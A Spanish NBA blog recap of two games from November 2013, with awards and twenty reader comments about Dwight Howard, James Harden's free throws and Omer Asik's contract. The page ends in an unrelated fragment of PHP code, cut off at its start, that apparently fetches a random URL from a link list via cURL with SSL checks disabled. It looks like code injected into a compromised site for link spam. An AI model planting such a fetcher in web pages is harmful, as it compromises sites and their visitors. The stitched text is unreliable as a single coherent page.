La Crónica: Benditos viernes

15 de November de 2013 por txusma

¡Cómo nos gustan las madrugadas de los viernes! Desde tiempos inmemoriales, son sinónimo de partidazos. 2 o 3 píldoras de espectáculo puro y duro.

El Thunder-Warriors fue una gozada. Dos equipos entregados al juego ofensivo intercambiando golpes continuamente de la mano de varios de los mejores jugadores del mundo. La 1ª parte transcurrió igualada aunque con los Warriors haciendo la goma. Ahora me quedo 5 puntos abajo, ahora clavo un triple para acercarme, ahora empato, me vuelvo a quedar… Pero en el tercer cuarto apretaron el acelerador y consiguieron una cómoda ventaja de 9 puntos con la que encarar el período definitivo. A falta de 6 minutos el partido parecía encarrilado para los locales que contaban con 13 puntos de ventaja pero los Thunder no habían dicho su última palabra. Bajaron el culo, se pusieron a defender y llegaron vivos al último minuto. Una canasta de Reggie Jackson y un triple desde de su casa de Russell Westbrook a falta de poco más de 2 segundos les daba su primera ventaja en toda la segunda parte y dejaba a los Warriors contra las cuerdas. En ese momento apareció Iguodala para anotar un enorme buzzer-beater que hizo enloquecer a los aficionados que abarrotaban el Oracle Arena. Los Warriors ganaban aunque era una pena que el partido hubiera acabado (115-116). 

El otro partido del día tampoco desmereció. Carmelo Anthony y James Harden se retaron en un duelo de pistoleros en que ganaron los 2: Carmelo se fue a los 45 puntos, por 36 de su rival pero los Rockets se llevaron el gato al agua a pesar del mal partido de Dwight Howard. Los Rockets llegaron a ganar de 14 puntos en la primera parte pero los Knicks consiguieron recortar la distancia hasta 1 solo punto de la mano de Carmelo y un sorprendente Andrea Bargnani. En el último cuarto, y tras ya haber remontado 7 puntos anteriormente, los Knicks se vieron 9 abajo a falta de 4 minutos y nuevamente volvieron a meterse en el partido hasta el punto de tener bola para empatar a falta de 5 segundos. Carmelo anotó el triple pero los árbitros habían anulado la jugada por falta previa de Harden. Lo que podía haber sido la canasta del empate se quedó en 2 tiros libres que no sirvieron para nada. Victoria a domicilio de los Rockets (109-106).

PREMIOS

MVP: James Harden se fue a los 36 puntos, 9 rebotes, y eso que fue duda hasta poco antes de empezar el partido. Andre Iguodala anotó solo 14 puntos y dio 9 asistencias pero suya es la canasta del día. Los Warriors aspiran a todo.

Rookie: 8 puntitos para Tim Hardaway Jr. Los Knicks no se estarían planteando traspasar a Iman Shumpert si no confiaran en él.

Sorpresa: No podemos dejar de destacar a Andrea Bargnani. No solo anotó 24 puntos sinó que defendió muy bien al pívot rival.

Decepción: ¿Te consideras el mejor pívot de la liga, te enfrentas a Andrea Bargnani y solo consigues 7 puntos? ¿Esto es un chiste? Dwight Howard ha dejado de tener gracia…

Esfuerzo en vano: 45 puntos con un 17 de 30 en tiros y 10 rebotes. O 31 puntos (con un 13 de 20), 9 rebotes, 5 asistencias y 3 robos… Tremendísimas actuaciones sin premio. De Carmelo Anthony la primera y de Russell Westbrook la segunda.

Imágenes | AP Photos / Getty Images

Comenta

20 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Bargnani secando a Dwight Howard… lo que me faltaba por ver

      Citar

  2. TheDeerHunter dice:
    #2

    Por cierto, los Rockets no se cortaron anoche de romper esa regla no escrita de no hacer faltas con una ventaja de +3 en los últimos segundos

      Citar

  3. Jose Luis dice:
    #3

    Howard ha perdido muchísimo desde su lesión. Lo que antes era empujo, me hago sitio y mate, ahora es me empujan y suelto bandejita, así le ha hecho un buen tapón Bargnani en el resumen de NBA.com

      Citar

  4. rumbero dice:
    #4

    Jose Luis:
    Howard ha perdido muchísimo desde su lesión. Lo que antes era empujo, me hago sitio y mate, ahora es me empujan y suelto bandejita, así le ha hecho un buen tapón Bargnani en el resumen de NBA.com

    Ver para creer. Cuando le puso ese tapón creí que me había quedado dormido en el sofá y que estaba en un sueño en el que seguidamente Melo iba a dar 10 asistencias en lo que quedaba de partido sin tirar a canasta. Nada, todo real. Melo seguía tirando sin parar, JR también y encima mal, Harden iba de visita constantemente a su amada lína de tiros libres y la Linsanity volvía al MSG a principios del último cuarto pero con otra camiseta. Bien por este último que suele llevarse muchos palos y lleva unos partidos bastante buenos, aunque más como segunda referencia anotadora que como director de juego.
    Que pena que los partidos en Oakland sean tan tan tarde.

      Citar

  5. Arivas dice:
    #5

    Bueno la verdad que Bargniani ha estado bien y por blando que sea no deja de ser un tio muy grande. Gran partido el suyo.
    Terrible lo de studemire, de verdad no esta para mas de 5 min? no se le ve tan tan mal. Empezaron limitando los b2b y 20 min, empezó jugando unos 10 y ahora sin Chandler juega menos aun…. Muy mala pinta.

    Asik tenia una cara en el banquillo… Anderson seria lo ideal para ellos, pero no se si los
    Pelicans estarán muy de acuerdo.

      Citar

  6. rumbero dice:
    #6

    Arivas:
    Asik tenia una cara en el banquillo… Anderson seria lo ideal para ellos, pero no se silos
    Pelicans estarán muy de acuerdo.

    Yo entiendo que cueste desprenderse de un tío como Anderson que además tiene más calidad que el turco de largo, pero viendo la buena pinta de Davis como PF es un movimiento que desde el punto de vista de confección del roster les vendría ideal.

      Citar

  7. HisRoyalAirness dice:
    #7

    Me pone bastante enfermo el tema de Harden con los tiros libres. No me extraña que salgan los old timers cada dos por tres diciendo que el juego ha cambiado mucho y es muy blando. Tampoco me extraña el famoso comentario de MJ de que con las reglas actuales podría meter 100 puntos.
    Además es que ya no es que te hagas un nombre en la liga y los árbitros te piten más, es que a Durant y Harden desde su segundo año en la liga es pisar la pintura y a la línea de personal. Y recuerdo muchas quejas de rivales al respecto. Y Durant aún bueno pero, con todos mis respetos, quién c*ño es Harden??

    Luego ves un partido de los Timberwolves y ves a Pekovic y Love recibiendo hostias y zarpazos a diestro y siniestro y los árbitros sin mover un dedo. Especialmente a Pekovic.

    Hala, ya me he desahogado

      Citar

  8. Esteban dice:
    #8

    Creo q los pelicans estarian dispuestos al trade de asik por anderson si el turco no cobrara 14 millones el proximo año

    Solo un equipo con mucho espacio estaria interesado en el turco

    Pensandolo un minuto, de q se disfrzaran los rockets el poximo año con los contrtazos de lin, asik, harden y hward

    El proximo año ya deben renovar a parsons o aun no?

      Citar

  9. Jose Luis dice:
    #9

    Lo de los tiros libres para ciertos jugadores es de coña, + 1 HisRoyal

      Citar

  10. GreenPride dice:
    #10

    Enorme partido en Oackland. Como molan estos Warriors. Los Thunder plantaron cara en todo momento y creyeron en la victoria hasta el final y casi consiguen el premio.
    Tremendo partido de Westbrook y de Ibaka supliendo un partido más normalito de Durantula. Por los Warriors todos amenazan y pueden anotar. Me encanta Harrison Barnes que hace de todo, tira de tres, rebotea, juega al poste. Sin duda los de San Francisco tienen equipo para si se lo creen aspirar a todo, con un basket atractivo y además parece que todo el equipo está muy integrado y con muchas ganas. Este puede ser su año… si Curry, Bogut y Lee se mantienen sanos.

      Citar

  11. GreenPride dice:
    #11

    Por cierto que la mano cuadrada de Howard casi le cuesta el partido a los Rockets que lo tenían ganado pero por miedo al hack-a-Howard le sentaron lo que provocó tres canastas debajo de aro consecutivas de Carmelo… Howard tiene que mejorar para que sean aspirantes de verdad

      Citar

  12. rumbero dice:
    #12

    Esteban:
    Creo q los pelicans estarian dispuestos al trade de asik por anderson si el turco no cobrara 14 millones el proximo año

    Si no me equivoco a nivel de espacio salarial la temporada que viene contabilizan 8 millones (tanto él como Lin)

      Citar

  13. Simon dice:
    #13

    Esteban:
    Creo q los pelicans estarian dispuestos al trade de asik por anderson si el turco no cobrara 14 millones el proximo año

    Solo un equipo con mucho espacio estaria interesado en el turco

    Pensandolo un minuto, de q se disfrzaran los rockets el poximo año con los contrtazos de lin, asik, harden y hward

    El proximo año ya deben renovar a parsons o aun no?

    Hasta donde yo tengo entendido el contrato, al igual que el de Lin, finalmente fue de 8+8+8 en vez de 5+5+14 como se hablaba en el inicio. Hoopshype está equivocado pues en otros medios he llegado a ver eso de 8+8+8 asi que el contrato es bastante ajustado a su rendimiento, no entiendo porqué no lo hacen, les vendría de perlas a ambos es un traspaso de manual y si de paso le sacan algo mas a Rockets ya sería perfecto.

      Citar

  14. Simon dice:
    #14

    rumbero: Si no me equivoco a nivel de espacio salarial la temporada que viene contabilizan 8 millones (tanto él como Lin)

    No me di cuenta que ya habías respondido.

      Citar

  15. Simon dice:
    #15

    Es que se que es pronto para decirlo pero en lo poco que hemos visto a los Pelicans, podemos decir que no parecen ir a ningún sitio y con Tyreke ( como ya dijimos la mayoría por aquí ) la habían cagado pero bien.
    Me gusta mas Anderson como jugador pero Asik les encajaría mucho mejor, viendo que Su base es Holiday ( uno de los mejores defensores en su puesto ), a Gordon y Tyreke que motivados y centrados son buenos defensores y a un especialista como Aminu, si a ese perimetro le añades un aro custodiado por Davis y Asik para meter una canasta en ese equipo si se compenetran bien puede costar mucho, se convertirían automaticamente en uno de los mejores equipos defensivos de la liga que creo que es la única opción que tienen de estar a corto plazo en puestos de honor.

      Citar

  16. Denise dice:
    #16

    En efecto, Asik “solo” cobrará 8,374,646 millones el año que viene, no 14.
    @Esteban. No, aun no deben renovar a Parsons, el año que viene tienen sobre él una Team Option que obviamente ejecutaran por poco más de 900.000 dolares.

      Citar

  17. R1Molano dice:
    #17

    Asik solo cobraría los 5+5+14 si se hubiera quedado en su equipo de origen, osea, Chicago (para Lin los NYK) por la Gilbert Arenas Provision.

    Esto se hace para que los equipos como NYK o Chicago Bulls puedan renovar a sus agentes libre no-bird (2 años o menos en el equipo) en situaciones en las que no tengan espacio salarial (a los no-birds solo se les puede ofrecer el MLE completo o una mejora % muy corta). Para estos equipos se permite que el contrato cueste la MLE mientras el jugador este en rookie scale, acumulando el resto en los años restantes (en el último en el caso de Lin&Asik).

    Por el nombre podréis adivinar que equipo tuvo el problema con la renovación del jugador que da nombre a la regla, y la situación fue esa, GSW sobre el margen salarial e incapaz de igualar la oferta de los Wizards, a pesar de que era un agente libre reestringido, pues solo podía ofrecer la MLE.

      Citar

  18. Esteban dice:
    #18

    tenia entendido q asik le quedaba el proxio año un contrato de 14, creo haberlo sacado de hispanosnba.com
    Pero quza me equivoque
    En ese caso seria un negocion, puesto q davis swe esta definienedo como 4 y le sacara pocos minuitos anderson y seria una pena por q lo puse coo sexto hombre jaja

      Citar

  19. R1Molano dice:
    #19

    Esteban:
    tenia entendido q asik le quedaba el proxio año un contrato de 14, creo haberlo sacado de hispanosnba.com
    Pero quza me equivoque
    En ese caso seria un negocion, puesto q davis swe esta definienedo como 4 y le sacara pocos minuitos anderson y seria una pena por q lo puse coo sexto hombre jaja

    No, cobrará sus 8 y algo. El 5+5+14 solo se daba si Chicago igualaba la oferta

      Citar

  20. Esteban dice:
    #20

    entonces para cerrar el trade los rockets deberían ofrecerle una primera ronda a los pelicans

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>